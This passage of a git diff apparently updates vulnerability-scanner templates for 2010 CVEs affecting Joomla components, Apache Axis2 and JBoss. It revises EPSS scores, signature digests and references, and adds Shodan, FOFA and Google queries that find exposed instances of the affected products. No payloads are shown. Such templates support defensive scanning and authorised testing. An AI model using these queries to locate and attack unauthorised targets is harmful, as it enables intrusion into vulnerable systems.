4a0a00473045022100cd47a2863b26749712c2a6dc10751c67722890228bfe2e440cbb5f791ff845a7022064315ce0626de27f7d31105d98aa58879aef1c16969e08b6d35c45bc2b11e8ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 40caec65d8..769add0531 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -18,13 +18,18 @@ info: cvss-score: 7.5 cve-id: CVE-2010-0157 cwe-id: CWE-22 - epss-score: 0.00826 - epss-percentile: 0.80104 + epss-score: 0.23423 + epss-percentile: 0.96555 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla product: joomla\! + shodan-query: + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" + fofa-query: body="joomla! - open source content management" tags: cve2010,cve,joomla,lfi,edb,packetstorm http: @@ -41,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201cc2638735aba64e480061e91a176acb1c5f885f26e50501697f8b444a66148b022075cccef4a1b6548b587c832158f624aa4192a98032f60e9f65fa9f9ec519b465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c4d28687b4669984fd7a6494440e35f1bdc5540a253c81a50eda9363af82f06c0221008c9916ea5e9328294b16e9ddf26f141418225f0ad0a5dedfc60c672e84e2d2f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 162fed1a75..4457aa2513 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -21,13 +21,16 @@ info: cve-id: CVE-2010-0219 cwe-id: CWE-255 epss-score: 0.97509 - epss-percentile: 0.99981 + epss-percentile: 0.99984 cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: axis2 - shodan-query: http.html:"Apache Axis" + shodan-query: + - http.html:"Apache Axis" + - http.html:"apache axis" + fofa-query: body="apache axis" tags: cve,cve2010,axis,apache,default-login,axis2 http: @@ -61,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207ae0781d6298d63fef1e109c6941979f3a9cf2cf97cf52d54fbf5506d103256d02202ab0a38916296abc146346b756d193740490f3a762c1929bf019e92da272776c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b202ff112ac09598ca6e373881d17b8a249a5398bf3a267b590ef948c91b8df2022015efa111b4715764807e6ae1c1516711d3d38d0a73835b1bbda2b1b7cf910854:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index 192e0ec010..1bd35cc90f 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0467 cwe-id: CWE-22 epss-score: 0.06955 - epss-percentile: 0.93792 + epss-percentile: 0.93927 cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202f4ff2ab58c70983fdbde0ee6860d7cb8229e81af51ace5e3e15533082c69a2d022072359ac609c3461da4901b3bb8ccaf83fcf42ccd7e480a74fec618aadba9dcfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200ffa1c79f56c51843e4ae33aade889343bc08e2cd48e34c96a18b426025d6fe8022100f0293ac85b2c273b5a96d641fd43b6aedb6c0408da0ddd0729d63ca2e87e81ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 151317113f..4bd0462920 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0696 cwe-id: CWE-22 epss-score: 0.57303 - epss-percentile: 0.97418 + epss-percentile: 0.97701 cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022062ed8cccf9ce298ba49005eb279ab8323d07a0560df9ee8857a3d007a3468fd6022025dbbd9a0d7b3ef88719e19a69fbb605dc7e77c1b087598f560b22547b2431d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220464645abae4d8bf812250b99a067483d22e89e09e5dafba7264b2d8d30900755022100c44339a7f47c1c7bdea6ba01152c037b2712977dab3d12e99aa1f9fa5d945493:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 4619ccc6cf..6aaf2895d7 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0759 cwe-id: CWE-22 epss-score: 0.01569 - epss-percentile: 0.86974 + epss-percentile: 0.87232 cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022033efcff5dab3e96c4bd25ffd1f08b5d509129b21c1952b48f4c5f5bce1845b20022100dc3da12554c6710754770645dcafc258f15112fee5ae614da245894df5d37c91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dc0516314760341830b6d829ac3d71cca66d790eed97e8c05aecafcac46e6b47022100c7ad39fcf6a99cad4066323df1b8cea073d37e4621111901fca6e3879bac4fb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index f40d55c22e..c63bf2f5e1 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0942 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.75244 + epss-percentile: 0.75733 cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022049a324c195808d1ac76829b45e8f27b6cd31e1527fcbe5131d00a009b78b98b7022100e3e31759811d9e4b4f7781ef77c85f6e426853daf5f1d8eaf52e966c01f8a88e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f696085a166eff1a9f78532c3fe14ed4163e59d9a96908e4ec91a0ee7bed142102210087f7ea06c03263d733dbbe87ff98cd03fba93940a5c21b9f889f1e6440fdc566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 4fab435111..e77376b28c 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0944 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.75244 + epss-percentile: 0.75733 cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203edf2b86718735a85d6b60ac6465e0d7f9aa063bbfb985ecba7fd8a82500bcc6022100a9017abad716d08a60243fdb71aed727e1b0bc2e44c3d591e200168e9f7bc182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008f1855af5bb1a227548d57889794aa0e4980ed4ad2d957a76ddae12c2637d95a02204db4794c8d6b70b3353904e9c69d9c72140784e582490844f39f61760ba387cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index ed8e98f25b..ff6e05ec42 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0972 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.81406 + epss-percentile: 0.81755 cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d3a39a822ed7fbffac4de0f1b0254ff4507f47002fe439be08c0983ec7a8613d022100958197a26e1b207a6910133f8e31baf385295e45ef9b589a8961292891f251c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440221008b9b59ffe3a50d64b3f18bb536f33fd35a3ab75c754ae5c347a93e5d240d4935021f796f07c35c8be0129aea12df6402810bd7a4197f0e7223ddc3a8488839c308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index a553692caa..a482e064f6 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -13,13 +13,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-0985 - http://www.exploit-db.com/exploits/10948 - https://exchange.xforce.ibmcloud.com/vulnerabilities/55348 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0985 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.83839 + epss-percentile: 0.85327 cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bca78e57f920f69e926e7fda61bfc9c1081621b67537c840fd5c4998a6e760b6022100bd476afda728ebf5fd521130fb22289a8aa64372043a3c537b90a9b626ad34f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220121eea2f8efc9e38cb12151304aa83d5e81bff2a4cfac268f37609a74c81813f022100896e64ab8e257721c1577ef38d42c20fa3aecccddeee80a7162233267d0eb854:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index 902e5d7506..0cc9627d7f 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/11511 - https://nvd.nist.gov/vuln/detail/CVE-2010-1081 - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1081 cwe-id: CWE-22 - epss-score: 0.0168 - epss-percentile: 0.8632 + epss-score: 0.37754 + epss-percentile: 0.97206 cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022020268f779e361916bc07ce33e39192307f3bce053f3a189e088b1f836199e7ca02201a54a5155fcfc628c13a0d8282ac74dba004ed58582cdf30fad1985c90f82252:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220228cf9600a1dd63059d5e2ae690546f448bb168b4aac5013ee1511b66f279402022100c2aed62495d6728080edeb426772b88be9b02b07d3c183921755b2758ef70cbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index e4bc052eb4..d65724c07b 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1219 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.81406 + epss-percentile: 0.81755 cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022078e94288c545c86d3739bfc673b0cb40d9db80ede64d7de24b9bfe1562d54d01022069a099e794e1021a4404dc94821f8840fe88456b958ec238d5edee3da0c18505:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205ffa95acf55e3fc510f649eb410e4a0f892762d3b01d027aacb75dbce13751dc022100e6fab3a55f59fb921e0729c14335dd11e766109e9e85e05c40cc56d8f9173bc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index e805a95731..7ec6beb698 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1305 cwe-id: CWE-22 epss-score: 0.03203 - epss-percentile: 0.90236 + epss-percentile: 0.91191 cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008359d835a31bb6cdf1904ec4e2657c736624dfcfa5fcd01f3a02a8257d33048d02204b9552e1cb25efd557234b0af9313dd2f5474de89c5865b764178e1d4d38905e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207ff5ab30f4234618c6cb8ff8937b8c3f026fa22540c30e4723be09fd9a170bd7022018299b594c95012ccccd91e2464086eb0b75f168ba8b37e2befe9afb330da921:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 28fd60e49b..d95f88f4a9 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1306 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.85196 + epss-percentile: 0.85468 cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220548521f736459dae087d6a2bd94e3ae9773f5b831cff83356187c4188522b8f802201265d0b432dbacee031aaaf9bcbc72699612e5e25f881527cde284df0d35481c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b69a0ddb75fe5a6e5e5da5c2cffef27949528448bd76ee69133c23453fe51e5e022100f835ef8902e4b818d7e38d065ff2246d9bad77fd846cd678376cc369edc01934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 118251644b..909abd19f3 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -13,13 +13,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1307 - http://www.vupen.com/english/advisories/2010/0806 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57531 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1307 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86604 + epss-percentile: 0.87931 cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205ee411e0df19bcb5be4939061e5b85f81c3ee3250e70223ecf19da638a332c6802207f1fbb956555429b3a2c32ad9d53e161530e3ebb76b3b8fafbc6483ff62c0d35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057b70110c3230255acf102d97928955ea4da363451c17f6c961dc10b8888192e022100bbcfb911dd6c03f2fb6017baa145fe3fc559aff548f13cd010ead3675f18379a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 0910a8204d..f23784557e 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1308 cwe-id: CWE-22 epss-score: 0.01334 - epss-percentile: 0.85765 + epss-percentile: 0.86023 cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c29bf12509751c6d4971b808635de57b7692d9e53df31d4b294649bb5ce456db022100bd518edc4ef976a87843b5cf5c4eec01353017a668000897cd0020a9fd09f094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100faf98bf9bc8f8cb6dedd82ccb2b5cf49ddafd0119858f6e6d38c60ee7d0e8caa02210090d3d8e293050de920c56613510427d16875207dd02019d3185c7209dd3d46b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 07ceab2896..dfa30448fc 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1312 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83338 + epss-percentile: 0.84812 cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d20ace89e5fba9e38e12b29dcdf7f94465027da5466716242a9d9a23d933a1b202200ead3153d09e06b648a9c10ea73a58a9c85db18e8c136d6d177acdccb61f00fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220027648d4d4ad81d25673691592a865aeba4edbbc49bb98f22254932f7cdf8396022100ec67dfc163a844ed2d62e9bd3f63faf0afa4b51563dd5801c7926ddfe9caa690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index d274284b73..def3364414 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/12082 - https://nvd.nist.gov/vuln/detail/CVE-2010-1313 - http://www.exploit-db.com/exploits/12082 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2010-1313 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.72402 + epss-percentile: 0.75061 cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e2ee5113ea7ef6e40728910e3d42e905985b5b2f7ce07d14947241170a9a1dc9022029c4419ef7ee627daa6f2d32119c452f396ae07a75d68bf757f8b36f3d72279e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015eb2f0633d1f1761aea73ac49a32a8c5f3f8d52eecf57edb76e58079036a216022047fcebd5259f4ddad0914d300ae4a4c5a374c3268897da3a734c54f4d85e3af7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index e951d57d27..1f4844a4f2 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1314 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.75244 + epss-percentile: 0.75733 cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009af853087a4818f3b40be3d023435dd789ec1badcb73949d41adfdfb8ffbe233022100d3bf069aa45a4e07a8ab6390cdc65d98ef6675f01ea2c12cba76b36042b91fc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207954ede2855432fd8a3e30891c30a1cf6213ba79e7d31905a775dd785c39553502203d862e5de7fc09c113afcf3796b211723a67c327466be378b9db7b34c333c531:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index 34e59780d7..f7e5f98449 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1352 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.75244 + epss-percentile: 0.75733 cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d337364bec15e62a5e51894f00482a853c0b83de12621326180d670fe85be2550220100fd4c82fbacc8ea7654009879641cc7e3cbbd695d9c489fe313644a3fdf818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008a7e3cd7e255b9065d048da6375fe2195b01c6d51c4da2c2084057a83d229d170220355ee9fc688f616e74e64c8d533816e1d490390823992a02d9ee83a88e3bc765:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index 74233ba758..f5d88de998 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1353 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.87665 + epss-percentile: 0.87931 cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022043fd12edb4a3a2a5476d0728b0371efefd549591b361970554bafd57766a5a7d0220319e614d046afdbc29519ddcf8c1b48b88a98655409e986e93b30e09366c7a41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220728d14721e7ffc97ae9101ec0a228589c6011874540942b1d947853989146acc022018abc77016af7a2f966797453910f502c217cd7ceee10b418b87b92ab3463193:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index 889e71aa9f..7eb0ab1afe 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1354 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73222 + epss-percentile: 0.75733 cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203e7b0577bb4c487c2041c049e54955ba57fcef21993bed3ee4a35397e5093009022012c708fe0fd04232b8a6542de8c0b947b5f72f266a2755b9ec230c1503415d79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207c61a8164fb31e72e6d98d6260e87eac00a5d414c127812939b6c3d4d5a65df3022100dc45b24eeb28c01993ffca9fec8ecfffa0f755494cb81ecfa6a918a770c9f9e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 29f5fdfb93..79ba7ce22d 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -29,7 +29,12 @@ info: max-request: 1 vendor: redhat product: jboss_enterprise_application_platform - shodan-query: title:"JBoss" + shodan-query: + - title:"JBoss" + - cpe:"cpe:2.3:a:redhat:jboss_enterprise_application_platform" + - http.title:"jboss" + fofa-query: title="jboss" + google-query: intitle:"jboss" tags: cve2010,cve,jboss,eap,tomcat,exposure,redhat http: @@ -49,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bdd3f2bcbf92f7f9b377bef80acf174a216abb0cb2acf3477efe856c2083c07702203e9b25701cd0278ddb795ca72e40c2c00dcb6e3924b009706b93a3f0d6416eac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f0371a0bff2d6fb8a4a91d31d0de9460d0b8dbc4827fa633bb7c4a52866e779022100a23c0e97b09c9bb709359301505a492d02b37f6704082040aa5450bd73c9c579:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 7cbc8e5249..7761bd9783 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/12232 - https://nvd.nist.gov/vuln/detail/CVE-2010-1461 - http://www.exploit-db.com/exploits/12232 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1461 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73149 + epss-percentile: 0.75733 cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207a92c230e02820f5272be13d2ee12a3e2739ac81ac8868dfbbe2ff407522df0c0220517ba0c636efa561e00528f86bcb0cdb861bc0e5382c72f4cb8f11b5fffc3b89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbfd8ea48c7ea963bf75e063f39dbb19633a7c111461cac4147532d71730a760022100831035f38425d12cc8628ada6e4deb423bc4abc0a38e3e8327de12cba5d4c203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index 2412d6d079..571332b9ac 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1469 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.81406 + epss-percentile: 0.81755 cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206c63f224a283f97a55ae4941e39f19ae06e9761cf123943f1b4d394ecef11ea9022100d2900835201e1b12398af58927fbaada9d98b609932bfc9f70d7c6263a16a705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100844dd8dd2eae03a8b5ffcd18a6903d89b7f1036f0e18a48b7d7a33905d9778dd022100b46694882b7e3cd5476bbb1f4cf5c11665b30414e1bc6de9889ce5c403770fcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 2ee9dcd3fa..7ca6737f7e 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1470 cwe-id: CWE-22 epss-score: 0.04616 - epss-percentile: 0.92373 + epss-percentile: 0.92547 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022005af39fb89c8d8753e1bcb87009d6d4d1de2cb594ed2c7fd92db1d9971237aeb022100bec720c951ec411c59b60dbf4113ab4a22c3e29ca90e8e253aab3e7e0dec4e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100da2c19c6c73f18f693a3f5738f94bd48ed8ea32318f948b347002daf22d5829a022100b1f9023b6aeafe5c201d51a5d173269fb99e5659fa8fd4586f6cc0e42b1ae457:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 343bae62dc..7473a66a17 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1471 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.93171 + 